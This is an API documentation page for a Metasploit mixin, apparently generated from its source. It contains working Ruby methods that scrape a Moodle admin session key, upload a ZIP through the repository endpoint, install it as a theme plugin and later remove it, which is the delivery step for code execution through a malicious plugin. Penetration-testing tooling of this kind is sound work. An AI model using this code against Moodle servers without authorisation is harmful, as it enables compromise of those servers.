Module: Msf::Exploit::Remote::HTTP::Moodle::Admin

Included in:
Msf::Exploit::Remote::HTTP::Moodle
Defined in:
lib/msf/core/exploit/remote/http/moodle/admin.rb

Instance Method Summary collapse

Instance Method Details

#get_addon_variablesString

Retrieves variables required for uploading an addon

Returns:

  • (String)

    session key

  • (String)

    item id

  • (String)

    author name

  • (String)

    client id


10
11
12
13
14
15
16
17
18
19
20
21
# File 'lib/msf/core/exploit/remote/http/moodle/admin.rb', line 10

def get_addon_variables
  res = send_request_cgi!(
    'keep_cookies' => true,
    'uri' => moodle_admin_addon_install
  )

  sesskey = res.body.split('"sesskey":"')[1].split('"')[0] # fetch session info
  item_id = res.body.split('amp;itemid=')[1].split('&')[0] # fetch item for upload
  author = res.body.split('title="View profile">')[1].split('<')[0] # fetch admin account profile info
  client_id = res.body.split('client_id":"')[1].split('"')[0] # fetch client info
  return sesskey, item_id, author, client_id
end

#plugin_integration(sesskey, file_id, plugin_name, type = 'theme') ⇒ HttpResponse?

Integrates an addon to Moodle

Parameters:

  • sesskey (String)

    session key

  • file_id (String)

    ID of the file to integrate

  • plugin_name (String)

    name of the plugin file

  • type (String) (defaults to: 'theme')

    The type of addon being added. Defaults to 'theme'

Returns:

  • (HttpResponse, nil)

    HttpResponse object, nil on failure


118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
# File 'lib/msf/core/exploit/remote/http/moodle/admin.rb', line 118

def plugin_integration(sesskey, file_id, plugin_name, type = 'theme')
  res = send_request_cgi(
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, 'admin', 'tool', 'installaddon', 'index.php'),
    'keep_cookies' => true,
    'vars_post' => {
      'sesskey' => sesskey,
      '_qf__tool_installaddon_installfromzip_form' => '1',
      'mform_showmore_id_general' => '0',
      'mform_isexpanded_id_general' => '1',
      'zipfile' => file_id,
      'plugintype' => type,
      'rootdir' => '',
      'submitbutton' => 'Install+plugin+from+the+ZIP+file'
    }
  )

  return nil unless res.body =~ /installzipstorage/

  storage = res.body.split('installzipstorage=')[1].split('&')[0]

  send_request_cgi(
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, 'admin', 'tool', 'installaddon', 'index.php'),
    'keep_cookies' => true,
    'vars_post' => {
      'installzipcomponent' => "#{type}_#{plugin_name}",
      'installzipstorage' => storage,
      'installzipconfirm' => '1',
      'sesskey' => sesskey
    }
  )
end

#remove_plugin(addon_name, moodle_version, sesskey) ⇒ HttpResponse

Uninstalls an addon from Moodle

Parameters:

  • addon_name (String)

    Name of addon to be uploaded

  • moodle_version (Rex::Version)

    Version of the moodle instance, as a Rex::Version

  • sesskey (String)

    session key

Returns:

  • (HttpResponse)

    HttpResponse object


80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
# File 'lib/msf/core/exploit/remote/http/moodle/admin.rb', line 80

def remove_plugin(addon_name, moodle_version, sesskey)
  if moodle_version < Rex::Version.new('3.9.0')
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
      'keep_cookies' => true,
      'vars_post' => {
        'cache' => '0',
        'confirmplugincheck' => '0',
        'abortinstallx' => '1',
        'confirmabortinstall' => '1',
        'sesskey' => sesskey
      }
    })
  else
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
      'keep_cookies' => true,
      'vars_post' => {
        'cache' => '0',
        'confirmrelease' => '1',
        'confirmplugincheck' => '0',
        'abortinstallx' => addon_name,
        'confirmabortinstall' => '1',
        'sesskey' => sesskey
      }
    })
  end
end

#upload_addon(addon_name, moodle_version, addon_content) ⇒ String?

Uploads an addon to Moodle

Parameters:

  • addon_name (String)

    Name of addon to be uploaded

  • moodle_version (Rex::Version)

    Version of the moodle instance, as a Rex::Version

  • addon_content (ZipArchive)

    Zip of the addon content

Returns:

  • (String, nil)

    file ID of the uploaded zip file, nil on failure

  • (String, nil)

    Session key, nil on failure


30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# File 'lib/msf/core/exploit/remote/http/moodle/admin.rb', line 30

def upload_addon(addon_name, moodle_version, addon_content)
  sesskey, item_id, author, client_id = get_addon_variables
  # creating multipart data for the upload addon file
  pdata = Rex::MIME::Message.new
  pdata.add_part(addon_content, 'application/zip', nil, "form-data; name=\"repo_upload_file\"; filename=\"#{addon_name}.zip\"")
  pdata.add_part('', nil, nil, 'form-data; name="title"')
  pdata.add_part(author, nil, nil, 'form-data; name="author"')
  pdata.add_part('allrightsreserved', nil, nil, 'form-data; name="license"')
  pdata.add_part(item_id, nil, nil, 'form-data; name="itemid"')
  pdata.add_part('.zip', nil, nil, 'form-data; name="accepted_types[]"')
  if moodle_version < Rex::Version.new('3.9.0')
    pdata.add_part('4', nil, nil, 'form-data; name="repo_id"')
  else
    pdata.add_part('5', nil, nil, 'form-data; name="repo_id"')
  end
  pdata.add_part('', nil, nil, 'form-data; name="p"')
  pdata.add_part('', nil, nil, 'form-data; name="page"')
  pdata.add_part('filepicker', nil, nil, 'form-data; name="env"')
  pdata.add_part(sesskey, nil, nil, 'form-data; name="sesskey"')
  pdata.add_part(client_id, nil, nil, 'form-data; name="client_id"')
  pdata.add_part('-1', nil, nil, 'form-data; name="maxbytes"')
  pdata.add_part('-1', nil, nil, 'form-data; name="areamaxbytes"')
  pdata.add_part('1', nil, nil, 'form-data; name="ctx_id"')
  pdata.add_part('/', nil, nil, 'form-data; name="savepath"')

  res = send_request_cgi!({
    'method' => 'POST',
    'data' => pdata.to_s,
    'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
    'keep_cookies' => true,
    'uri' => normalize_uri(target_uri.path, 'repository', 'repository_ajax.php'),
    'vars_get' => {
      'action' => 'upload'
    }
  })

  unless res.body =~ /draftfile.php/
    return nil, nil
  end

  file_id = res.body.split('draft\/')[1].split('\/')[0]
  return file_id, sesskey
end